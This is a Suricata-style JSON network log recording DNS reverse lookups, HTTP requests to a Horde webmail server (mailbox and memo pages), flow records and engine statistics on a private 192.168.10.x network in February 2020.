{"timestamp":"2020-02-29T00:07:08.350330+0000","flow_id":20416851390565,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49564,"proto":"UDP","dns":{"type":"answer","id":35492,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:11.433029+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57163,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20847,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:11.541143+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57163,"proto":"UDP","dns":{"type":"answer","id":20847,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:11.541143+0000","flow_id":174022061955973,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57163,"proto":"UDP","dns":{"type":"answer","id":20847,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:11.614596+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360}} {"timestamp":"2020-02-29T00:07:11.614596+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:07:13.001742+0000","flow_id":1646985371396187,"event_type":"flow","src_ip":"192.168.10.122","src_port":52256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:11.927835+0000","end":"2020-02-29T00:02:12.039358+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:14.000393+0000","event_type":"stats","stats":{"uptime":14086,"capture":{"kernel_packets":133750,"kernel_drops":0},"decoder":{"pkts":133793,"bytes":92539822,"invalid":183,"ipv4":132336,"ipv6":8,"ethernet":133793,"raw":0,"null":0,"sll":0,"tcp":127208,"udp":4930,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2713,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2729,"synack":2720,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1756,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2249,"failed_udp":110},"tx":{"http":4545,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2326}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2294,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20837,"memcap_state":0,"memcap_global":0},"http":{"memuse":41230,"memcap":0}}} {"timestamp":"2020-02-29T00:07:16.000296+0000","flow_id":1288304062889383,"event_type":"flow","src_ip":"192.168.10.122","src_port":41386,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:02:15.196007+0000","end":"2020-02-29T00:02:15.307685+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:16.615624+0000","flow_id":285025491706982,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":360},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":613,"tx_id":0}} {"timestamp":"2020-02-29T00:07:20.223330+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58451,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35085,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:20.332082+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58451,"proto":"UDP","dns":{"type":"answer","id":35085,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:20.332082+0000","flow_id":1599723571538018,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58451,"proto":"UDP","dns":{"type":"answer","id":35085,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:20.401062+0000","flow_id":1214181537235511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5750}} {"timestamp":"2020-02-29T00:07:21.000157+0000","event_type":"stats","stats":{"uptime":14093,"capture":{"kernel_packets":133797,"kernel_drops":0},"decoder":{"pkts":133800,"bytes":92540236,"invalid":183,"ipv4":132341,"ipv6":8,"ethernet":133800,"raw":0,"null":0,"sll":0,"tcp":127213,"udp":4930,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2713,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2729,"synack":2720,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1756,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2249,"failed_udp":110},"tx":{"http":4545,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2326}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2296,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20837,"memcap_state":0,"memcap_global":0},"http":{"memuse":53911,"memcap":0}}} {"timestamp":"2020-02-29T00:07:24.001722+0000","flow_id":936726630439456,"event_type":"flow","src_ip":"192.168.10.122","src_port":43411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:23.858656+0000","end":"2020-02-29T00:02:23.964468+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:25.401776+0000","flow_id":1214181537235511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52696,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5750},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:07:28.000450+0000","event_type":"stats","stats":{"uptime":14100,"capture":{"kernel_packets":133819,"kernel_drops":0},"decoder":{"pkts":133822,"bytes":92548413,"invalid":183,"ipv4":132363,"ipv6":8,"ethernet":133822,"raw":0,"null":0,"sll":0,"tcp":127233,"udp":4932,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2714,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2730,"synack":2721,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1757,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2250,"failed_udp":110},"tx":{"http":4546,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2327}},"flow_mgr":{"closed_pruned":2694,"new_pruned":15,"est_pruned":2297,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20506,"memcap_state":0,"memcap_global":0},"http":{"memuse":2192,"memcap":0}}} {"timestamp":"2020-02-29T00:07:29.000493+0000","flow_id":1061177603184026,"event_type":"flow","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:02:28.578970+0000","end":"2020-02-29T00:02:28.812490+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:30.133597+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27477,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:30.242241+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":27477,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:30.242241+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":27477,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:30.268255+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:07:30.268255+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:07:32.000140+0000","flow_id":893085479963979,"event_type":"flow","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":28,"bytes_toserver":3250,"bytes_toclient":28563,"start":"2020-02-29T00:05:29.625995+0000","end":"2020-02-29T00:06:30.686607+0000","age":61,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:32.000396+0000","flow_id":263627957994143,"event_type":"flow","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:05:30.656031+0000","end":"2020-02-29T00:06:30.686645+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:34.388868+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:07:34.399804+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43605,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49607,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:34.508268+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43605,"proto":"UDP","dns":{"type":"answer","id":49607,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:34.508268+0000","flow_id":23852826892732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43605,"proto":"UDP","dns":{"type":"answer","id":49607,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:34.638156+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:07:34.638156+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":199,"tx_id":1}} {"timestamp":"2020-02-29T00:07:34.656889+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54527,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33582,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:34.764835+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54527,"proto":"UDP","dns":{"type":"answer","id":33582,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:34.764835+0000","flow_id":746339340518905,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54527,"proto":"UDP","dns":{"type":"answer","id":33582,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:34.862566+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5486}} {"timestamp":"2020-02-29T00:07:35.000218+0000","event_type":"stats","stats":{"uptime":14107,"capture":{"kernel_packets":133828,"kernel_drops":0},"decoder":{"pkts":133831,"bytes":92550250,"invalid":183,"ipv4":132372,"ipv6":8,"ethernet":133831,"raw":0,"null":0,"sll":0,"tcp":127240,"udp":4934,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2715,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2731,"synack":2722,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1758,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2251,"failed_udp":110},"tx":{"http":4547,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2328}},"flow_mgr":{"closed_pruned":2696,"new_pruned":15,"est_pruned":2298,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21166,"memcap_state":0,"memcap_global":0},"http":{"memuse":53880,"memcap":0}}} {"timestamp":"2020-02-29T00:07:35.005162+0000","flow_id":17002334350197,"event_type":"flow","src_ip":"192.168.10.122","src_port":35837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:33.551797+0000","end":"2020-02-29T00:02:33.658408+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:39.863240+0000","flow_id":1337983970224512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5486},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":27327,"tx_id":2}} {"timestamp":"2020-02-29T00:07:40.000714+0000","flow_id":1521357579846265,"event_type":"flow","src_ip":"192.168.10.122","src_port":39579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:39.033401+0000","end":"2020-02-29T00:02:39.144484+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:42.000516+0000","flow_id":926165322136906,"event_type":"flow","src_ip":"192.168.10.81","src_port":52692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1219,"bytes_toclient":8809,"start":"2020-02-29T00:06:31.425290+0000","end":"2020-02-29T00:06:41.624893+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:42.000731+0000","flow_id":384282168206084,"event_type":"flow","src_ip":"192.168.10.122","src_port":42164,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:41.140036+0000","end":"2020-02-29T00:02:41.244983+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:43.000189+0000","event_type":"stats","stats":{"uptime":14115,"capture":{"kernel_packets":133852,"kernel_drops":0},"decoder":{"pkts":133853,"bytes":92559420,"invalid":183,"ipv4":132392,"ipv6":8,"ethernet":133853,"raw":0,"null":0,"sll":0,"tcp":127256,"udp":4938,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2715,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2731,"synack":2722,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1758,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2253,"failed_udp":110},"tx":{"http":4549,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2330}},"flow_mgr":{"closed_pruned":2696,"new_pruned":15,"est_pruned":2300,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20173,"memcap_state":0,"memcap_global":0},"http":{"memuse":2032,"memcap":0}}} 